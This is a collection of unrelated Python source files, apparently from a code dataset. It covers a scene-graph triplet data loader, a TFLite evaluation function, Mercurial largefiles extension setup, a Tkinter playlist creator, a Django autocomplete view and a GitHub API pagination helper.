    """Triplet dataset over image scene-graph data for metric learning.

    Serves (anchor, positive, negative) graph triples. Pos/neg membership is
    encoded in the relative image paths, formatted as
    ``subdir/pos_<imgid>_<num>`` or ``subdir/neg_<imgid>_<num>``, with
    (apparently) 4 numbered images per label — TODO confirm against the data.
    Detection features and pre-built geometry graphs are loaded from disk;
    samples are streamed through a background BlobFetcher process.
    """
    def default_loader(path):
        # NOTE(review): defined without `self` and shadowed by the module-level
        # default_loader assigned in __init__; appears to be dead code.
        return Image.open(path).convert('RGB')
    def reset_iterator(self):
        """Restart the background prefetcher and rewind the epoch iterator."""
        del self._prefetch_process
        self._prefetch_process = BlobFetcher(self, if_shuffle = (self.split=='train'))
        # self._prefetch_process = BlobFetcher(self, if_shuffle=True)
        self.iterator = 0
    def __init__(self, sg_geometry_path, det_feats_path, batch_size=16, split='train', use_box_feats=True, use_neg_anchor=True):
        """Load detection features, remember graph paths, and start the prefetcher.

        sg_geometry_path: directory of pre-built geometry graphs (.npy per image).
        det_feats_path: pickle of per-image detection feature dicts.
        use_neg_anchor: whether 'neg' images may also serve as triplet anchors.
        """
        random.seed(7)  # fixed seed for reproducible triplet sampling
        self.split = split
        self.batch_size = batch_size
        self.loader = default_loader # for img loading, using PIL
        self.geometry_relation = True
        self.use_box_feats = use_box_feats
        self.use_neg_anchor = use_neg_anchor # whether to sample negs as anchors too
        # setup retrieving det feats
        self.det_feats_path = det_feats_path # det feats
        # # detection feats, keys = paths (so need to convert idx to path)
        # use detection feats organized by img, which is output from cal_geo_feats
        # dict of dicts
        self.det_feats = pickle.load(open(self.det_feats_path, 'rb'))
        # setup getting built geo graph
        self.sg_geometry_dir = sg_geometry_path # geo graph built
        print('\nLoading detection feats from dir: {}\n'.format(self.det_feats_path))
        print('\nLoading geo graphs from dir: {}\n'.format(self.sg_geometry_dir))
        self.geom_feat_size = 8  # dimensionality of a geometry edge feature
        # get paths, put in list
        self.idx2path = list(self.det_feats.keys())
        self.path2idx = self.get_idx_by_path() # a dict
        self.idxs = [i for i in range(len(self.idx2path))]
        # ** I have another way of getting apn. He uses in just get_pairs(),
        self.iterator = 0
        print('Assigned %d images to split %s'%(len(self.idx2path), split))
        # only shuffle if train set
        self._prefetch_process = BlobFetcher(self, self.split=='train', num_workers=4)
        def cleanup():
            # Ensure the prefetcher's worker process is torn down at exit.
            print('Terminating BlobFetcher')
            del self._prefetch_process
        import atexit
        atexit.register(cleanup)
    def __len__(self):
        ''' Used by the _prefetch_process() to work properly '''
        return len(self.det_feats)
    def __getitem__(self, index):
        '''
        Used by the _prefetch_process() to work properly
        '''
        # print('get item called {}:'.format(index))
        sg_data = self.get_full_graph_by_idx(index)
        return [sg_data, index]  # does it have to be a tuple?
    def get_idx_by_path(self):
        ''' key = path, val = idx '''
        idx_by_path = {}
        for idx, path in enumerate(self.idx2path):
            idx_by_path[path] = idx
        return idx_by_path
    def _get_geo_graph_by_idx(self, index):
        """Load the pre-built geometry graph (dict with 'edges' and 'feats') for a sample."""
        # get the geo graph data
        sg_geo_dir = self.sg_geometry_dir
        sample_rel_path = self.idx2path[index] # relative path, used for key look up
        sg_geo_path = os.path.join(sg_geo_dir, sample_rel_path) + '.npy' # need to add ext
        rela = np.load(sg_geo_path, allow_pickle=True)[()] # dict contains keys of edges and feats
        return rela
    def _get_det_feats_by_idx(self, index):
        """Return the detection feature dict for the sample at *index*."""
        path = self.idx2path[index] # relative path, used for key look up
        det_feats = self.det_feats[path]
        return det_feats
    def get_full_graph_by_idx(self, index):
        """Assemble the full graph sample: visual feats, boxes, relations and (optionally) box feats."""
        # retieve geo graph
        rela = self._get_geo_graph_by_idx(index)
        # retrieve visual feats
        det_feats = self._get_det_feats_by_idx(index)
        visual_feats = det_feats['visual']
        box = det_feats['box'] # in xyxy format, changed from xywh format
        obj_count = det_feats['obj_count']
        # NOTE(review): obj_count is reshaped but never added to sg_data below —
        # confirm whether it is intentionally unused.
        obj_count = np.reshape(obj_count, (-1, 1)) # make a N x 1 vector
        # print('obj_count reshaped', obj_count)
        if self.use_box_feats:
            box_feats = self.get_box_feats(det_feats)
            sg_data = {'visual': visual_feats, 'box_feats': box_feats, 'rela': rela, 'box': box}
        else:
            sg_data = {'visual': visual_feats, 'rela': rela, 'box':box}
        return sg_data
    def get_box_feats(self, det_feats):
        ''' uses the detection feats to calc the box feats'''
        # full image shape
        H, W, _ = det_feats['hwc'].astype(float)
        x1, y1, x2, y2 = np.hsplit(det_feats['box'].astype(float), 4)
        w = x2-x1
        h = y2-y1
        # normalized (cx, cy, w, h, area) per box
        box_feats = np.hstack((0.5 * (x1 + x2) / W, 0.5 * (y1 + y2) / H, w/W, h/H, w*h/(W*H)))
        #box_feats = box_feat / np.linalg.norm(box_feats, 2, 1, keepdims=True)
        return box_feats
    def get_triplet(self, q_path):
        '''
        Given path of a query, build the triplet
        Labels are in the path, which will tell us how to choose negs and pos
        format: 0000/pos_2kaq0r_00.jpg,  -> subdir/pos_img_id.ext, or subdir/neg_img_id.ext

        Returns (anchor_path, positive_path, negative_path).
        '''
        img_nums_per_label = 4 # per label
        # parse q path
        q_subdir, q_file = q_path.split('/')
        q_label, q_img_name, q_img_num = q_file.split('_')
        q_img_num = int(q_img_num)
        # set anchor positive no matter what
        if not self.use_neg_anchor:
            if q_label == 'neg':
                n_path = q_path # neg is the anchor
                # sample 2 diff numbers for img nums to be a and p
                a_num, p_num = np.random.choice(img_nums_per_label, 2, replace=False)
                # build up anchor path
                a_file_name = '_'.join(['pos', q_img_name, str(a_num).zfill(2)])
                a_path = os.path.join(q_subdir, a_file_name)
                # build up pos path
                p_file_name = '_'.join(['pos', q_img_name, str(p_num).zfill(2)])
                p_path = os.path.join(q_subdir, p_file_name)
            else: # q label is pos
                a_path = q_path
                # find a different pos
                nums = [i for i in range(img_nums_per_label)]
                n_num = np.random.choice(nums) # can be same as query num, since diff label
                # # sample a diff number for img nums to be p, exclude the query
                # p_num = np.random.choice(nums.remove(q_img_num))
                nums.remove(q_img_num)
                p_num = np.random.choice(nums)
                # build up anchor path
                p_file_name = '_'.join(['pos', q_img_name, str(p_num).zfill(2)])
                p_path = os.path.join(q_subdir, p_file_name)
                # build up pos path
                n_file_name = '_'.join(['neg', q_img_name, str(n_num).zfill(2)])
                n_path = os.path.join(q_subdir, n_file_name)
        # allow neg anchor
        else:
            # same = is same label as anchor
            # diff = diff label than anchor
            # num_idx = 0-49
            # just use whatever the query path is as the anchor (neg or pos)
            a_path = q_path
            # selecting a random num idx
            nums = [i for i in range(img_nums_per_label)]
            diff_num = np.random.choice(nums)
            nums.remove(q_img_num)
            same_num = np.random.choice(nums)
            # get the right name
            if q_label == 'pos':
                same_label = 'pos'
                diff_label = 'neg'
            else:
                diff_label = 'pos'
                same_label = 'neg'
            # build up same path
            same_file_name = '_'.join([same_label, q_img_name, str(same_num).zfill(2)])
            same_path = os.path.join(q_subdir, same_file_name)
            # build up diff path
            diff_file_name = '_'.join([diff_label, q_img_name, str(diff_num).zfill(2)])
            diff_path = os.path.join(q_subdir, diff_file_name)
            p_path = same_path
            n_path = diff_path
        return a_path, p_path, n_path
    def get_batch(self, batch_size=None):
        """Assemble one padded triplet batch.

        Returns a dict with padded/masked graph tensors for anchors
        ('sg_data_a'), positives ('sg_data_p') and negatives ('sg_data_n'),
        plus epoch bookkeeping in 'bounds' and per-sample paths in 'infos'.
        """
        batch_size = batch_size or self.batch_size
        sg_batch_a = []
        sg_batch_p = []
        sg_batch_n = []
        infos = []
        wrapped = False # represents one full epoch use of the dataloader
        for i in range(batch_size):
            # fetches a sample randomly, can be a photoshop version as anchor. handles multiple epochs by shuffling
            tmp_sg_a, idx_a, tmp_wrapped = self._prefetch_process.get()
            path_a = self.idx2path[idx_a]
            # based on what is returned, find the pos and neg versions
            a_path, p_path, n_path = self.get_triplet(path_a)
            a_idx, p_idx, n_idx = self.path2idx[a_path], self.path2idx[p_path], self.path2idx[n_path]
            # retrieve the graphs
            graph_a = self.get_full_graph_by_idx(a_idx)
            graph_p = self.get_full_graph_by_idx(p_idx)
            graph_n = self.get_full_graph_by_idx(n_idx)
            sg_batch_a.append(graph_a)
            sg_batch_p.append(graph_p)
            sg_batch_n.append(graph_n)
            # record associated info as well
            info_dict = {}
            info_dict['ix_a'] = idx_a
            info_dict['a_path'] = a_path
            info_dict['p_path'] = p_path
            info_dict['n_path'] = n_path
            infos.append(info_dict)
            if tmp_wrapped:
                wrapped = True
                break
        data = {}
        # find max number of objects in an image across each batch
        max_box_len_a = max([_['visual'].shape[0] for _ in sg_batch_a])
        max_box_len_p = max([_['visual'].shape[0] for _ in sg_batch_p])
        max_box_len_n = max([_['visual'].shape[0] for _ in sg_batch_n])
        # print('max_box_len_a: ', max_box_len_a)
        # print('max_box_len_p: ', max_box_len_p)
        # print('max_box_len_n: ', max_box_len_n)
        # just meta data on the batch
        data['bounds'] = {'it_pos_now': self.iterator, 'it_max': len(self.idx2path), 'wrapped': wrapped}
        data['infos'] = infos # a/p/n paths and idxs used in batch
        data['sg_data_a'] = self.batch_sg(sg_batch_a, max_box_len_a)
        data['sg_data_p'] = self.batch_sg(sg_batch_p, max_box_len_p)
        data['sg_data_n'] = self.batch_sg(sg_batch_n, max_box_len_n)
        return data
    def batch_sg(self, sg_batch, max_box_len):
        """Pad a list of graph samples into dense batch arrays with validity masks.

        Pads visual feats, boxes, (optional) box feats and relation
        edges/feats to max_box_len / the longest edge list, and emits
        'visual_masks' / 'rela_masks' marking which entries are real.
        """
        rela_batch = [_['rela'] for _ in sg_batch]
        box_batch = [_['box'] for _ in sg_batch]
        visual_batch = [_['visual'] for _ in sg_batch]
        sg_data = {}
        # visual feats, shape: (B, max_box_len, 128)
        sg_data['visual'] = np.zeros([len(visual_batch), max_box_len, visual_batch[0].shape[1]], dtype = 'float32')
        for i in range(len(visual_batch)):
            # for ith sample, set all up to its num of objects
            sg_data['visual'][i, :visual_batch[i].shape[0]] = visual_batch[i]
        sg_data['visual_masks'] = np.zeros(sg_data['visual'].shape[:2], dtype='float32')
        for i in range(len(visual_batch)):
            sg_data['visual_masks'][i, :visual_batch[i].shape[0]] = 1
        sg_data['obj_boxes'] = np.zeros([len(box_batch), max_box_len, 4], dtype = 'float32')
        for i in range(len(box_batch)):
            sg_data['obj_boxes'][i, :len(box_batch[i])] = box_batch[i]
        if self.use_box_feats:
            box_feats_batch = [_['box_feats'] for _ in sg_batch]
            sg_data['box_feats'] = np.zeros([len(box_feats_batch), max_box_len, 5], dtype = 'float32')
            for i in range(len(box_feats_batch)):
                sg_data['box_feats'][i, :len(box_feats_batch[i])] = box_feats_batch[i]
        # rela
        max_rela_len = max([_['edges'].shape[0] for _ in rela_batch])
        sg_data['rela_edges'] = np.zeros([len(rela_batch), max_rela_len, 2], dtype = 'int')
        if self.geometry_relation:
            sg_data['rela_feats'] = np.zeros([len(rela_batch), max_rela_len, self.geom_feat_size], dtype = 'float32')
        else:
            sg_data['rela_feats'] = np.zeros([len(rela_batch), max_rela_len], dtype='int')
        # rela_masks, because not all items in rela_edges and rela_feats are meaningful
        sg_data['rela_masks'] = np.zeros(sg_data['rela_edges'].shape[:2], dtype='float32')
        for i in range(len(rela_batch)):
            sg_data['rela_edges'][i, :rela_batch[i]['edges'].shape[0]] = rela_batch[i]['edges']
            sg_data['rela_feats'][i, :rela_batch[i]['edges'].shape[0]] = rela_batch[i]['feats']
            sg_data['rela_masks'][i, :rela_batch[i]['edges'].shape[0]] = 1
        return sg_data
#%%
class BlobFetcher():
    """Prefetch items from ``dataloader`` through a background DataLoader.

    ``dataloader`` must behave as a torch ``Dataset`` and expose ``idxs``
    (the serving order) and ``iterator`` (current position). Items are
    yielded in ``idxs`` order; at an epoch boundary the underlying loader is
    rebuilt and, if ``if_shuffle`` is set, ``idxs`` is reshuffled.
    """

    def __init__(self, dataloader, if_shuffle=False, num_workers=4):
        """
        :param dataloader: dataset-like object exposing ``idxs`` and ``iterator``.
        :param if_shuffle: reshuffle ``idxs`` at every epoch boundary.
        :param num_workers: worker processes for the underlying DataLoader.
        """
        self.dataloader = dataloader
        self.if_shuffle = if_shuffle
        self.num_workers = num_workers
        # we need the first epoch to be shuffled; before, it was in annotation
        # order, even for the val set
        random.shuffle(self.dataloader.idxs)

    def reset(self):
        """
        Two cases for this function to be triggered:
        1. not hasattr(self, 'split_loader'): Resume from previous training. Create the dataset given the saved split_ix and iterator
        2. wrapped: a new epoch, the split_ix and iterator have been updated in the get_minibatch_inds already.
        """
        # batch_size is 1, the merge is done in DataLoader class
        self.split_loader = iter(data.DataLoader(dataset=self.dataloader,
                                                 batch_size=1,
                                                 sampler=SubsetSampler(self.dataloader.idxs[self.dataloader.iterator:]),
                                                 shuffle=False,
                                                 pin_memory=True,
                                                 num_workers=self.num_workers,
                                                 worker_init_fn=None,
                                                 collate_fn=lambda x: x[0]))

    def _get_next_minibatch_inds(self):
        """Return (next dataset index, whether the epoch wrapped around)."""
        max_index = len(self.dataloader.idxs)
        wrapped = False
        ri = self.dataloader.iterator
        ix = self.dataloader.idxs[ri]
        ri_next = ri + 1
        if ri_next >= max_index:
            ri_next = 0
            if self.if_shuffle:
                print('shuffling')
                random.shuffle(self.dataloader.idxs)
            wrapped = True
        self.dataloader.iterator = ri_next
        return ix, wrapped

    def get(self):
        """Fetch the next prefetched item and return ``item + [wrapped]``."""
        if not hasattr(self, 'split_loader'):
            self.reset()
        ix, wrapped = self._get_next_minibatch_inds()
        # Bug fix: ``iterator.next()`` is Python 2 only; Python 3 removed the
        # method, so use the builtin next().
        tmp = next(self.split_loader)
        if wrapped:
            self.reset()
        try:
            # sanity check: the item's trailing index must match the sampler's
            assert tmp[-1] == ix, "ix not equal"
        except Exception as E:
            # Bug fix: the original format string read 'tmp[-1 {}' (missing ']').
            print('ix {}, tmp[-1] {}'.format(ix, tmp[-1]))
            print(E)
        return tmp + [wrapped]
#%%
class SubsetSampler(torch.utils.data.sampler.Sampler):
    """Yield the given indices sequentially, in their original order.

    Note: despite drawing from a user-supplied index list, iteration is NOT
    randomized here -- callers shuffle ``indices`` themselves if desired.

    Arguments:
        indices (list): a list of indices
    """

    def __init__(self, indices):
        self.indices = indices

    def __iter__(self):
        # Sequential pass over the stored indices.
        return iter(self.indices)

    def __len__(self):
        return len(self.indices)
6486671 | from .attn_talling_head import *
from .cls_block import *
| StarcoderdataPython |
11373183 | import numpy as np
def evaluate_model(dataset, interpreter):
    """Run a TFLite ``interpreter`` over ``dataset`` and return accuracy.

    ``dataset`` must yield ``(test_images, test_labels)`` pairs.

    NOTE(review): ``labels.append(test_labels)`` appends the *entire* label
    object once per image; this only lines up with ``predictions`` if each
    yielded ``test_labels`` is effectively one label per image -- confirm
    against the dataset's batching.
    """
    input_index = interpreter.get_input_details()[0]["index"]
    output_index = interpreter.get_output_details()[0]["index"]
    predictions = []
    labels = []
    done = 0
    for test_images, test_labels in dataset:
        # Run predictions on every image in the "test" dataset.
        for i, test_image in enumerate(test_images):
            done += 1
            # Lightweight progress indicator.
            if done % 1000 == 0:
                print(done, end='; ')
            # Pre-processing: the model expects a float32 tensor with a
            # leading batch dimension.
            test_image = np.expand_dims(test_image, axis=0).astype(np.float32)
            interpreter.set_tensor(input_index, test_image)
            interpreter.invoke()
            # Post-processing: drop the batch dimension and take the class
            # with the highest score.
            output = interpreter.tensor(output_index)
            predictions.append(np.argmax(output()[0]))
            labels.append(test_labels)
    # Compare prediction results with ground-truth labels.
    prediction_digits = np.array(predictions)
    return (prediction_digits == labels).mean()
| StarcoderdataPython |
11399611 | # Copyright 2009-2010 <NAME>
# Copyright 2009-2010 Intelerad Medical Systems Incorporated
# Copyright 2010-2011 Fog Creek Software
# Copyright 2010-2011 Unity Technologies
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''setup for largefiles extension: uisetup'''
from mercurial import archival, cmdutil, commands, extensions, filemerge, hg, \
httprepo, localrepo, merge, sshrepo, sshserver, wireproto
from mercurial.i18n import _
from mercurial.hgweb import hgweb_mod, protocol, webcommands
from mercurial.subrepo import hgsubrepo
import overrides
import proto
def uisetup(ui):
    """Hook the largefiles extension into Mercurial's UI layer.

    Runs once at extension-load time (before any repository is opened) and
    monkey-patches: core commands (add/remove/status/log/...), merge and
    filemerge internals, hg.update/clean/merge, archiving, the wire
    protocol (new put/get/statlfile commands plus wrapped capabilities and
    heads), hgweb permissions, the ssh/http client call streams, and a few
    other extensions (fetch, purge, rebase, transplant) when present.
    """
    # Disable auto-status for some commands which assume that all
    # files in the result are under Mercurial's control
    entry = extensions.wrapcommand(commands.table, 'add',
                                   overrides.overrideadd)
    addopt = [('', 'large', None, _('add as largefile')),
              ('', 'normal', None, _('add as normal file')),
              ('', 'lfsize', '', _('add all files above this size '
                                   '(in megabytes) as largefiles '
                                   '(default: 10)'))]
    entry[1].extend(addopt)
    entry = extensions.wrapcommand(commands.table, 'addremove',
                                   overrides.overrideaddremove)
    entry = extensions.wrapcommand(commands.table, 'remove',
                                   overrides.overrideremove)
    entry = extensions.wrapcommand(commands.table, 'forget',
                                   overrides.overrideforget)
    # Subrepos call status function
    entry = extensions.wrapcommand(commands.table, 'status',
                                   overrides.overridestatus)
    entry = extensions.wrapfunction(hgsubrepo, 'status',
                                    overrides.overridestatusfn)
    entry = extensions.wrapcommand(commands.table, 'log',
                                   overrides.overridelog)
    entry = extensions.wrapcommand(commands.table, 'rollback',
                                   overrides.overriderollback)
    entry = extensions.wrapcommand(commands.table, 'verify',
                                   overrides.overrideverify)
    verifyopt = [('', 'large', None, _('verify largefiles')),
                 ('', 'lfa', None,
                  _('verify all revisions of largefiles not just current')),
                 ('', 'lfc', None,
                  _('verify largefile contents not just existence'))]
    entry[1].extend(verifyopt)
    entry = extensions.wrapcommand(commands.table, 'outgoing',
                                   overrides.overrideoutgoing)
    outgoingopt = [('', 'large', None, _('display outgoing largefiles'))]
    entry[1].extend(outgoingopt)
    entry = extensions.wrapcommand(commands.table, 'summary',
                                   overrides.overridesummary)
    summaryopt = [('', 'large', None, _('display outgoing largefiles'))]
    entry[1].extend(summaryopt)
    entry = extensions.wrapcommand(commands.table, 'update',
                                   overrides.overrideupdate)
    entry = extensions.wrapcommand(commands.table, 'pull',
                                   overrides.overridepull)
    entry = extensions.wrapcommand(commands.table, 'cat',
                                   overrides.overridecat)
    # Merge machinery must treat largefile standins specially.
    entry = extensions.wrapfunction(merge, '_checkunknownfile',
                                    overrides.overridecheckunknownfile)
    entry = extensions.wrapfunction(merge, 'manifestmerge',
                                    overrides.overridemanifestmerge)
    entry = extensions.wrapfunction(filemerge, 'filemerge',
                                    overrides.overridefilemerge)
    entry = extensions.wrapfunction(cmdutil, 'copy',
                                    overrides.overridecopy)
    # Summary calls dirty on the subrepos
    entry = extensions.wrapfunction(hgsubrepo, 'dirty',
                                    overrides.overridedirty)
    # Backout calls revert so we need to override both the command and the
    # function
    entry = extensions.wrapcommand(commands.table, 'revert',
                                   overrides.overriderevert)
    entry = extensions.wrapfunction(commands, 'revert',
                                    overrides.overriderevert)
    # clone uses hg._update instead of hg.update even though they are the
    # same function... so wrap both of them)
    extensions.wrapfunction(hg, 'update', overrides.hgupdate)
    extensions.wrapfunction(hg, '_update', overrides.hgupdate)
    extensions.wrapfunction(hg, 'clean', overrides.hgclean)
    extensions.wrapfunction(hg, 'merge', overrides.hgmerge)
    extensions.wrapfunction(archival, 'archive', overrides.overridearchive)
    extensions.wrapfunction(cmdutil, 'bailifchanged',
                            overrides.overridebailifchanged)
    # create the new wireproto commands ...
    wireproto.commands['putlfile'] = (proto.putlfile, 'sha')
    wireproto.commands['getlfile'] = (proto.getlfile, 'sha')
    wireproto.commands['statlfile'] = (proto.statlfile, 'sha')
    # ... and wrap some existing ones
    wireproto.commands['capabilities'] = (proto.capabilities, '')
    wireproto.commands['heads'] = (proto.heads, '')
    wireproto.commands['lheads'] = (wireproto.heads, '')
    # make putlfile behave the same as push and {get,stat}lfile behave
    # the same as pull w.r.t. permissions checks
    hgweb_mod.perms['putlfile'] = 'push'
    hgweb_mod.perms['getlfile'] = 'pull'
    hgweb_mod.perms['statlfile'] = 'pull'
    extensions.wrapfunction(webcommands, 'decodepath', overrides.decodepath)
    # the hello wireproto command uses wireproto.capabilities, so it won't see
    # our largefiles capability unless we replace the actual function as well.
    proto.capabilitiesorig = wireproto.capabilities
    wireproto.capabilities = proto.capabilities
    # these let us reject non-largefiles clients and make them display
    # our error messages
    protocol.webproto.refuseclient = proto.webprotorefuseclient
    sshserver.sshserver.refuseclient = proto.sshprotorefuseclient
    # can't do this in reposetup because it needs to have happened before
    # wirerepo.__init__ is called
    proto.ssholdcallstream = sshrepo.sshrepository._callstream
    proto.httpoldcallstream = httprepo.httprepository._callstream
    sshrepo.sshrepository._callstream = proto.sshrepocallstream
    httprepo.httprepository._callstream = proto.httprepocallstream
    # don't die on seeing a repo with the largefiles requirement
    localrepo.localrepository.supported |= set(['largefiles'])
    # override some extensions' stuff as well
    for name, module in extensions.extensions():
        if name == 'fetch':
            extensions.wrapcommand(getattr(module, 'cmdtable'), 'fetch',
                                   overrides.overridefetch)
        if name == 'purge':
            extensions.wrapcommand(getattr(module, 'cmdtable'), 'purge',
                                   overrides.overridepurge)
        if name == 'rebase':
            extensions.wrapcommand(getattr(module, 'cmdtable'), 'rebase',
                                   overrides.overriderebase)
        if name == 'transplant':
            extensions.wrapcommand(getattr(module, 'cmdtable'), 'transplant',
                                   overrides.overridetransplant)
| StarcoderdataPython |
9774857 | import os
from tkinter import *
from tkinter import filedialog
from tkmacosx import Button, CircleButton
import tkinter.font as font
import datetime as dt
import SongDB as s_db
import PlaylistDB as p_db
import Tapes as tp
import Playlists as pl
import ProjTools as pt
import numpy as np
class CreatePlayList(Frame):
    """Tkinter frame for building a playlist from library searches or file paths.

    Songs are accumulated in ``self.current_playlist`` (a list of file
    paths) and persisted as a named playlist via the ``p_db`` module.
    """

    def __init__(self, root):
        """Lay out labels, entries and buttons on *root*."""
        Frame.__init__(self, root)
        self.current_playlist = []
        self.current_playlist_name = ""
        u_font = font.Font(family='Helvetica', size=16)
        # NOTE(review): .place() returns None, so or_label holds None, not the
        # widget -- harmless while nothing reads it back.
        self.or_label = Label(root, text='Please enter in the song name or search path.',
                              font=font.Font(family='Helvetica', size=16), bg='#EBDEF0', fg='red', bd=10).place(
            relx=0.515, rely=0.35, anchor=CENTER)
        self.home_label = pt.create_Frame_label(root, 'PlayList Creator')
        self.name_label = Label(root, text='Playlist Name: ', font=u_font, bg='#EBDEF0', bd=3)
        self.name_label.place(x=20, y=50)
        self.search_label = Label(root, text='Song Name: ', font=u_font, bg='#EBDEF0', bd=3)
        self.search_label.place(x=20, y=130)
        self.find_song_path_label = Label(root, text='Enter Path: ', font=u_font, bg='#EBDEF0', bd=3)
        self.find_song_path_label.place(x=20, y=160)
        self.name_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
        self.name_entry.place(x=150, y=50)
        self.search_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
        self.search_entry.place(x=150, y=130)
        self.find_song_path_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
        self.find_song_path_entry.place(x=150, y=160)
        self.find_song_path_entry.insert(0, '/User/username/..../song_name')
        self.add_button = Button(root, text='Add', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
                                 activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
                                 command=self.__get_add)
        self.add_button.place(relx=0.88, rely=0.80, anchor=SE)
        self.submit_button = Button(root, text='Submit', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
                                    activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
                                    command=self.__get_create)
        self.submit_button.place(relx=0.88, rely=0.965, anchor=SE)
        self.clear_button = CircleButton(root, text='CE', font=font.Font(family='Helvetica', size=12), bg='#A3E4D7',
                                         fg='#5F4B8B', borderless=1,
                                         activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', radius=20,
                                         command=self.__get_clear)
        self.clear_button.place(relx=0.98, rely=0.40, anchor=SE)
        load_button = Button(root, text='Search Path', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
                             activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
                             command=self.__get_load)
        load_button.place(relx=0.016, rely=0.74)

    # /Users/varunpoondi/Desktop/mp4-Music/Playboi Carti- 9 AM in Calabasas remix(prod by Adrian).mp4
    def __get_load(self):
        """Open a file picker and put the chosen path into the path entry."""
        self.find_song_path_entry.delete(0, END)
        self.music_file = filedialog.askopenfilename()
        self.find_song_path_entry.insert(0, self.music_file)

    def __get_add(self):
        """Add a song to the working playlist.

        Prefers a library search by name; otherwise parses the entered file
        path as '<author>-<song>.<ext>' and registers it as a new tape.
        """
        self.current_playlist_name = self.name_entry.get()
        if self.search_entry.get() != '':
            search_result = s_db.get_music_by_name(self.search_entry.get())
            if search_result is None:
                self.search_entry.delete(0, END)
                self.search_entry.insert(0, 'Song Was not found in you library.')
            else:
                music_path = s_db.get_path_by_title(search_result)
                print("Song was found in your library")
                self.current_playlist.append(music_path)
                self.search_entry.delete(0, END)
        else:
            flag = pt.file_checker(self.find_song_path_entry)
            if not flag:
                self.find_song_path_entry.delete(0, END)
                self.find_song_path_entry.insert(0, 'Invalid File Path! Please try again.')
            else:
                path = self.find_song_path_entry.get()
                arr = path.split('/')
                song_title = arr[-1]
                parse = song_title.split('-')
                author = parse[0]
                song = parse[-1]
                # drop the 4-character extension (e.g. '.mp4')
                song = str(song)[:-4]
                author = pt.format_vars(author)
                song = pt.format_vars(song)
                tape = tp.Tape(path, author, song)
                s_db.add_tape(tape)
                self.current_playlist.append(tape.video_path)
                print('song added')
                s_db.get_lib_info()

    def __get_create(self):
        """Persist the working playlist under its name, if the name is unused."""
        if p_db.get_playlist_by_title(self.current_playlist_name) is None:
            my_array = np.array(self.current_playlist)
            date = dt.date.today()
            current_date = str(date.month) + "-" + str(date.day) + "-" + str(date.year)
            playlist = pl.Playlist(my_array, self.current_playlist_name, current_date)
            p_db.add_playlist(playlist)
            print(playlist.__str__())
            self.name_entry.delete(0, END)
        else:
            self.name_entry.delete(0, END)
            self.name_entry.insert(0, 'Playlist title already exists! Please choose a unique name.')
        self.search_entry.delete(0, END)
        self.find_song_path_entry.delete(0, END)

    def __get_clear(self):
        """Clear the search and path entry fields."""
        self.find_song_path_entry.delete(0, END)
        self.search_entry.delete(0, END)
| StarcoderdataPython |
53578 | from django.shortcuts import render
from django.views.generic import CreateView
from django.urls import reverse_lazy
from dal import autocomplete
# from .models import Country, Person
# from .forms import PersonForm
from .models import Country
from .forms import CountryForm
# Create your views here.
# class PersonCreateView(CreateView):
# model = Person
# form_class = PersonForm
# template_name = 'person_form.html'
# view_name = 'create-person'
# success_url = reverse_lazy(view_name)
# Create your views here.
class CountryCreateView(CreateView):
    # Standard Django CreateView for Country; on success it redirects back
    # to itself so another entry can be added immediately.
    model = Country
    form_class = CountryForm
    template_name = 'person_form.html'  # NOTE(review): reuses the person template -- confirm intended
    view_name = 'create-country'
    success_url = reverse_lazy(view_name)
class CountryAutocompleteView(autocomplete.Select2QuerySetView):
    """Select2 autocomplete endpoint for Country, filtered by name.

    Cleanup: removed leftover debug ``print`` statements and commented-out
    experiments; behavior of the endpoint itself is unchanged.
    """

    def get_queryset(self):
        """Return countries whose name contains the search term, if any."""
        qs = Country.objects.all()
        if self.q:
            qs = qs.filter(name__icontains=self.q)
        return qs

    def get_create_option(self, context, q):
        """Form the correct create_option to append to results."""
        create_option = []
        display_create_option = False
        if self.create_field and q:
            page_obj = context.get('page_obj', None)
            if page_obj is None or page_obj.number == 1:
                display_create_option = True
                # Don't offer to create a new option if a
                # (case-insensitive) identical one already exists
                existing_options = (self.get_result_label(result).lower()
                                    for result in context['object_list'])
                if q.lower() in existing_options:
                    display_create_option = False
        if display_create_option and self.has_add_permission(self.request):
            create_option = [{
                'id': q,
                'text': ('"%(new_value)s"') % {'new_value': q},
                'create_id': True,
            }]
        return create_option

    def has_add_permission(self, request):
        # Anyone may create entries through the autocomplete (no auth check).
        return True
1721856 | <filename>github_loading.py
import logging
from requests.models import Response
from EntityLoader import LoadBehaviour
def get_url_params(params: dict) -> str:
    """Render *params* as a URL query string ('?a=1&b=2'); '' when empty."""
    query = '&'.join('{}={}'.format(key, value) for key, value in params.items())
    return '?' + query if query else ''
class GithubLoadBehaviour(LoadBehaviour):
    """LoadBehaviour for GitHub's paginated REST API (token auth)."""

    def __init__(self,
                 _token: str,
                 per_page: int,
                 _logger: logging.Logger):
        super().__init__()
        self._per_page = per_page
        self._token = _token
        self._logger = _logger

    def _get_url_params(self, params: dict) -> str:
        # '?a=1&b=2' for a non-empty dict, '' otherwise.
        query = '&'.join('{}={}'.format(key, value) for key, value in params.items())
        return '?{}'.format(query) if query else ''

    def _get_remaining_limit(self, resp: Response) -> int:
        # Missing or empty rate-limit header counts as exhausted (0).
        remaining = resp.headers.get('X-RateLimit-Remaining')
        return int(remaining) if remaining else 0

    def _get_params(self, page) -> dict:
        return {'per_page': self._per_page, 'page': page, 'state': 'all'}

    def _get_headers(self) -> dict:
        return {'Authorization': 'token {}'.format(self._token)}

    def _get_next_page(self, cur_page: int, resp: Response) -> int:
        # Advance on success; on any error (including 403 rate limiting)
        # stay on the same page so it can be retried.
        return cur_page + 1 if resp.status_code < 400 else cur_page

    def _is_last_page(self, return_object_count: int, resp: Response) -> bool:
        status = int(resp.status_code)
        # A short page on a successful response means the listing is
        # exhausted; a 404 means there is nothing further to fetch.
        if return_object_count < self._per_page and status < 400:
            return True
        return status == 404
